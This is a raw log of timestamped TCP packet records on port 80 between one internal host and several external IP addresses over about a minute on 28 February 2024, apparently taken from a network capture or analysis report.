Feb 28, 2024 15:46:12.974584103 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974622965 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974661112 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974708080 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974750996 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.978441954 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.978502989 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.978852034 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:13.519671917 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:14.535651922 CET	50247	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:14.855067015 CET	80	50247	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:14.855490923 CET	50247	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:14.855633974 CET	50247	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:15.174998045 CET	80	50247	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:15.178976059 CET	80	50247	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:15.179074049 CET	80	50247	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:15.179392099 CET	50247	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:15.179481030 CET	50247	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:15.498795033 CET	80	50247	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:20.768702030 CET	50248	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:21.093092918 CET	80	50248	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:21.093296051 CET	50248	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:21.093451023 CET	50248	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:21.418426037 CET	80	50248	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:21.418509960 CET	80	50248	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:23.611294985 CET	50249	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:23.937994957 CET	80	50249	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:23.938258886 CET	50249	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:23.938435078 CET	50249	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:24.265032053 CET	80	50249	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:24.265114069 CET	80	50249	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:26.454325914 CET	50250	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:26.782892942 CET	80	50250	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:26.783149004 CET	50250	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:26.784461975 CET	50250	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:26.784509897 CET	50250	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:26.784564018 CET	50250	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:27.113221884 CET	80	50250	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:27.113334894 CET	80	50250	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:27.113346100 CET	80	50250	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:27.113357067 CET	50250	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:27.113540888 CET	50250	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:27.113580942 CET	80	50250	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:27.113718987 CET	80	50250	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:27.442511082 CET	80	50250	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:27.442529917 CET	80	50250	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.313169003 CET	50251	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:29.641925097 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.642252922 CET	50251	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:29.642379045 CET	50251	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:29.979315996 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.979629040 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.979737043 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.979809999 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.979866982 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.979921103 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.979974031 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.980027914 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.980081081 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.980127096 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:29.980349064 CET	50251	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:29.980701923 CET	50251	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:29.980885029 CET	50251	80	192.168.11.20	84.32.84.32
Feb 28, 2024 15:46:30.317745924 CET	80	50251	84.32.84.32	192.168.11.20
Feb 28, 2024 15:46:35.604060888 CET	50252	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:35.924813986 CET	80	50252	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:35.925081015 CET	50252	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:35.925522089 CET	50252	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:36.247968912 CET	80	50252	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:36.248047113 CET	80	50252	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:36.248102903 CET	80	50252	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:36.248162031 CET	80	50252	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:36.248353958 CET	50252	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:36.248410940 CET	50252	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:36.568762064 CET	80	50252	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:36.568973064 CET	50252	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:37.437278032 CET	50252	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:38.451764107 CET	50253	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:38.772099018 CET	80	50253	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:38.772545099 CET	50253	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:38.772727013 CET	50253	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:39.152354956 CET	80	50253	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:39.203196049 CET	80	50253	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:39.203252077 CET	80	50253	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:39.203305006 CET	80	50253	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:39.203341961 CET	80	50253	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:39.203551054 CET	50253	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:39.523889065 CET	80	50253	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:39.524121046 CET	50253	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:40.279191017 CET	50253	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:41.294821978 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:41.611146927 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:41.611442089 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:41.614469051 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:41.614516973 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:41.930951118 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:41.930963993 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:41.931173086 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:41.931222916 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:41.931269884 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:41.931438923 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:42.247561932 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.247647047 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.247769117 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.247823000 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:42.247874975 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:42.247922897 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:42.247975111 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.247997046 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.248090982 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:42.248262882 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:42.564321041 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.564376116 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.564481974 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.564501047 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.564611912 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.564631939 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.564649105 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.564667940 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.564891100 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.565951109 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.566061020 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.566085100 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.566181898 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.566293955 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:42.566350937 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:42.882560968 CET	80	50254	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:42.882755041 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:43.122354984 CET	50254	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:44.137926102 CET	50255	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:44.456840992 CET	80	50255	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:44.456988096 CET	50255	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:44.457201958 CET	50255	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:44.777651072 CET	80	50255	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:44.777693033 CET	80	50255	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:44.777723074 CET	80	50255	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:44.777754068 CET	80	50255	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:44.777995110 CET	50255	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:45.096883059 CET	80	50255	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:45.097230911 CET	50255	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:45.097292900 CET	50255	80	192.168.11.20	62.149.128.45
Feb 28, 2024 15:46:45.416457891 CET	80	50255	62.149.128.45	192.168.11.20
Feb 28, 2024 15:46:50.510273933 CET	50256	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:50.811841965 CET	80	50256	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:50.811996937 CET	50256	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:50.812330961 CET	50256	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:51.114979982 CET	80	50256	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:51.115005016 CET	80	50256	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:51.115324974 CET	50256	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:52.323481083 CET	50256	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:53.339205980 CET	50257	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:53.641376972 CET	80	50257	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:53.641694069 CET	50257	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:53.641835928 CET	50257	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:53.944509983 CET	80	50257	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:53.944592953 CET	80	50257	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:53.945113897 CET	50257	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:55.151074886 CET	50257	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:56.166651011 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:56.471292019 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.471610069 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:56.472906113 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:56.473031044 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:56.777898073 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.777983904 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.778049946 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.778099060 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.778165102 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.778212070 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.778229952 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:56.778295040 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.778336048 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.778410912 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:56.778578043 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:56.778681040 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:56.779006958 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:56.779176950 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:57.083040953 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.083118916 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.083277941 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:57.083444118 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:57.083560944 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.083678007 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.083761930 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.083837986 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.083882093 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:57.083983898 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.084048033 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:57.084304094 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.084384918 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.125129938 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.388504982 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.388904095 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.388981104 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389031887 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389148951 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389218092 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389271021 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389336109 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389401913 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389472961 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389539957 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389617920 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389698029 CET	80	50258	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:57.389879942 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:57.978581905 CET	50258	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:58.994211912 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.298769951 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.299030066 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.299144030 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.636909008 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637016058 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637080908 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637135983 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637186050 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.637221098 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637279034 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637300014 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.637355089 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637403965 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637456894 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637466908 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.637515068 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.637550116 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.637717009 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.941966057 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942061901 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942123890 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942183018 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942224979 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.942281008 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942336082 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942348003 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.942413092 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942468882 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942517042 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.942542076 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942595005 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:46:59.942636013 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.942842960 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:46:59.942985058 CET	50259	80	192.168.11.20	91.195.240.19
Feb 28, 2024 15:47:00.247515917 CET	80	50259	91.195.240.19	192.168.11.20
Feb 28, 2024 15:47:06.248707056 CET	50260	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:06.561332941 CET	80	50260	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:06.561536074 CET	50260	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:06.561790943 CET	50260	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:06.876025915 CET	80	50260	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:06.876094103 CET	80	50260	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:06.876144886 CET	80	50260	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:06.876365900 CET	50260	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:08.070219994 CET	50260	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:09.085912943 CET	50261	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:09.411320925 CET	80	50261	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:09.411578894 CET	50261	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:09.411895037 CET	50261	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:09.720710993 CET	80	50261	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:09.720797062 CET	80	50261	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:09.720850945 CET	80	50261	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:09.721072912 CET	50261	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:10.913331985 CET	50261	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:11.929011106 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.252607107 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.252866030 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.254273891 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.254368067 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.587205887 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.587306023 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.587393999 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.587449074 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.587474108 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.587542057 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.587626934 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.587640047 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.587810993 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.587877035 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.587994099 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.588121891 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.910926104 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.911045074 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.911199093 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.911248922 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.911425114 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.911561966 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:12.911621094 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.911681890 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.911933899 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.911990881 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.912400961 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.912688017 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:12.912740946 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:13.224834919 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:13.224956036 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:13.225030899 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:13.225334883 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:13.225404024 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:13.225454092 CET	80	50262	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:13.225642920 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:13.756535053 CET	50262	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:14.772058010 CET	50263	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:15.087588072 CET	80	50263	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:15.087821960 CET	50263	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:15.087985992 CET	50263	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:15.400064945 CET	80	50263	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:15.400135994 CET	80	50263	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:15.400182962 CET	80	50263	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:15.400558949 CET	50263	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:15.400626898 CET	50263	80	192.168.11.20	103.146.179.172
Feb 28, 2024 15:47:15.712860107 CET	80	50263	103.146.179.172	192.168.11.20
Feb 28, 2024 15:47:21.007139921 CET	50264	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:21.321629047 CET	80	50264	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:21.321899891 CET	50264	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:21.322045088 CET	50264	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:21.636347055 CET	80	50264	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:21.636750937 CET	80	50264	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:21.636805058 CET	80	50264	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:21.636970043 CET	50264	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:22.832561970 CET	50264	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:23.848150969 CET	50265	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:24.167591095 CET	80	50265	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:24.167812109 CET	50265	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:24.168030024 CET	50265	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:24.487106085 CET	80	50265	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:24.487358093 CET	80	50265	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:24.487421036 CET	80	50265	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:24.487632990 CET	50265	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:25.675698996 CET	50265	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:26.691299915 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.005924940 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.006243944 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.007545948 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.007574081 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.007622957 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.322048903 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.322113991 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.322154999 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.322195053 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.322232962 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.322252035 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.322421074 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.322551012 CET	80	50266	109.234.166.81	192.168.11.20
